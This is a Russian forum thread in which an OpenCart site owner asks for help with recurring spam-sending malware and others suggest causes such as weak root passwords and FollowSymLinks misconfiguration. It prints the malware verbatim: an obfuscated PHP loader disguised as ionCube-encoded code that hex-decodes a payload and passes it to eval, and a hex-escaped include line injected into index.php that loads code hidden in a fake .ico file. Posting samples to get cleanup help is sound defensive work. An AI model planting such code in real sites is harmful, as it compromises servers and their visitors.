На сайт попадают вирусы

[JaguarTL]

Здравствуйте, имеется сайт на opencart 2.1.0.1 

На сайт попадают вирусы, делающие автоматическую рассылку. На сервере появляются такие файлы ca3ytaoy.php, file52.php, ir3wfgkz.php и т.д. Файлы содержат:

<?php //00036b
if (!extension_loaded('IonCube_loader')) {$__oc = strtolower(substr(php_uname(), 0, 3));$__ln = 'ioncube_loader_' . $__oc . '_' . substr(phpversion(), 0, 3) . (($__oc == 'win') ? '.dll' : '.so');if (function_exists('il_exec')) {return il_exec();}$__ln = '/ioncube/' . $__ln;$__ln = "preg_replace";$__oid = @fopen(__FILE__, 'rb');$__id = realpath('extension_dir');$__here = dirname(__FILE__);if (strlen($__id) > 1 && $__id[1] == ':') {$__id = str_replace('\\', '/', substr($__id, 2));$__here = str_replace('\\', '/', substr($__here, 2));}$__rd = "/" . str_repeat('/..', substr_count($__id, '/')) . $__here . '/';$__i = strlen($__rd);while ($__i--) {if ($__rd[$__i] == '/') {$__lp = substr($__rd, 0, $__i) . $__ln;if ($__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0xa29-0x579)));break;}}}eval($__ln);return 0;} else {die('The file ' . __FILE__ . " is corrupted.\n");}if (function_exists('il_exec')) {return il_exec();}echo('Please check System Requirements on vendor site because the file <b>' . __FILE__ . '</b> requires the ionCube PHP Loader ' . basename($__ln) . ' to be installed by the site administrator.');return 0;

?>
24M7FaU6fJ6Y16bM74C772K03d2Y0R4S1T7K27Z2I61792J8S27616G56D6B7a696527K3HdK3eG
27A78M6c6aU7a79U27B2B93b2479N75R6772J6420V3d2U0E41727I26L17M9282N76T26d6f6L
56a6TeM27L3d3Ce277Y4Q7W073O747aU77272T9I3b66F6Df726561G6368202B84N172T72C61
Y7W9G2824J7Oa6VfG6G16Lb7477E2c202N45IfX504f535I42c2Q024797567J7K264T2cM2024
5Ff434Of4Nf4Fb494L5R2J920617S3X20Z2K4N73787Z874W2E920I7Ub666f72656163682B0M
2U8247F3D78J7D8R74206T1L7T320V2A46c6c7A27268V7520D3d3Ae2024707A17a65N61B2F9
L207b24P70L717a6561203dQ20407F06U1636VbF282248L2aD22P2PcD2X0W247M071Z7Ga656
1L293b246Dc6cR727268J75202e3XdM202266653B564E6338T36K6X42d3I164Y35S332dE346
P435W32O2d39I306430R2JdX36J3O1H363E431373733326563D38K223bX24S636X87667W2C0
3d20N2F4L707N1P7aS656R120W5e207L37G5S62J737E47M228P7374X72V5f726M57065R6174
2T82E4C6cG6Fc7V27268X752c2Y02C8A7374726Vc656e2824N70X71H7aX65H6U129G2U02f20
7I3747F26c6E5Q6e2M82Y4J6cE6c72F72687C5292920Q2b20Q3129W2Ec20302cA20S7L3G7G4
Z7D26Bc656XeZ28Z24F7L0K71R7aP6Z5612M9293bD246368Y76672K0W3FdY2065787O06Wc6N
f64652D822M2A3222cY2024U63687Z6C67K2U9X3b6V966202S86V36f7J56eU742Y8246K3D68
7D6Q67J292P0K3d3Dd2Y0332920H7b65S7N661B6cQ2824S63Q6876675BbM31T5d28B2463D6K
87K6675Zb3D25dF2T929C3bA657869H74282C9X3b7d7d7Wd

 

В index.php вверху добавляется:

/*dbdb8*/

@include "\x2fvar\x2fwww\x2fwww\x2droo\x74/da\x74a/w\x77w/m\x75sco\x6fl.c\x6fm/c\x61tal\x6fg/c\x6fntr\x6flle\x72/fa\x76ico\x6e_42\x32f56\x2eico";

/*dbdb8*/

 

[JaguarTL]

На сайте стоят 2 модуля. 

1) Управление категориями +

2) Обмен данными с 1C v8.x (Tesla-Chita)

 

Помогите, пожалуйста, найти уязвимость

[Yoda]

https://ocshop.info/stop-zlovred/

[Гість smartcoder]

Недавно клиент спрашивал похожий вопрос, вирусы типа на сайте.

В итоге сам хостер потом предоставил им такую услугу "чистку вашего сайта от вирусов"

Может в хостинге то дело?)

[ArtemPitov]

в большинстве случаем такое на шарде бывает, когда не правильно настроен FollowSymLinks  https://habrahabr.ru/sandbox/90459/

Так же довольно часто бывает - пробивают через панель управления сервером которая открыта на распашку или же через ssh который доступен под root 

в одного клиента так и было, логин root пароль 6 букв, вот и приплыли после такого